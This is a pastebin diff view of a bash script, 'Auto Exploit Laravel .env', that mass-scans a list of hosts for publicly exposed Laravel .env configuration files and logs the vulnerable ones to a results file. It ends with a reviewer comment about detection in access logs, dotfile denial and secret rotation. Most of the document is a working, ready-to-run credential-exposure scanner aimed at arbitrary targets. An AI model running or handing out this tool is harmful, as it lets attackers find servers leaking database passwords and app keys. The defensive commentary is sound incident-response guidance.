View difference between Paste ID: ryMHP2p2 and RFGHiinx
1
#!/bin/bash
2
# Auto Exploit Laravel .env
3
# Coded by ZeroByte.id
4
# https://zerobyte.id/ - https://blog.zerobyte.id/
5
6
function exploitwww() {
7
	target=$s;
8
	wtp="https://www.$target";
9
	#echo $wtp
10
	w=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $wtp'/.env');
11
	if [[ $w =~ 'APP_ENV' ]]; then
12
		echo "[OK] $target/.env";
13
		echo "$target/.env" >> result.txt
14
	else
15
		echo "[BAD] $target";
16
	fi
17
}
18
function exploit() {
19
	target=$s;
20
	htp="http://$target"
21
	e=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $htp'/.env');
22
	if [[ $e =~ 'APP_ENV' ]]; then
23
		echo "[OK] $target/.env";
24
		echo "$target/.env" >> result.txt
25
	else
26
		echo "[BAD] $target";
27
	fi
28
}
29
function exploithttps() {
30
	target=$s;
31
	hts="https://$target"
32
	a=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $hts'/.env');
33
	if [[ $a =~ 'APP_ENV' ]]; then
34
		echo "[OK] $target/.env";
35
		echo "$target/.env" >> result.txt
36
	elif [[ $a =~ 'Moved Permanently' ]]; then
37
		exploitwww $target
38
	else
39
		echo "[BAD] $target";
40
	fi
41
}
42
cat << "banner"
43
 _____              _           _         _     _
44
|__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
45
  / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
46
 / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
47
/____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
48
                          |___/                  
49
-------------------------------------------------
50
-------- Laravel Environment Exploiter ----------
51
-------------------------------------------------
52
Usage : ./laravel.sh list.txt
53
54
banner
55
for s in $(cat $1); do
56
	target=$s;
57
	g=$(curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" -w %{http_code} $target -o /dev/null);
58
	if [[ $g =~ '200' ]]; then
59
		exploit $s
60
	elif [[ $g =~ '301' ]]; then
61
		exploithttps $s
62
	else
63
		echo "[UNKNOWN] => $target"
64
	fi
65
done
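Review bot: The header comment names only the author and a site, and nothing in the script documents what `exploit`, `exploithttps` and `exploitwww` put on the wire, which is what a responder reading this paste needs. I would add a comment block above `exploit` describing the traffic: one GET to the bare host, then a GET for `/.env` over `http://`, `https://` or `https://www.`, always with the fixed `Chrome/62.0.3202.75` User-Agent, and a line appended to `result.txt` whenever the body contains `APP_ENV`. Stated that way the detection is direct: requests for `/.env` carrying that User-Agent in the access log. The server-side fix is to serve only Laravel's `public/` directory as the document root and to deny dotfile requests. A host whose response matched `APP_ENV` has most likely served its configuration file, so the secrets in it should be treated as disclosed and rotated.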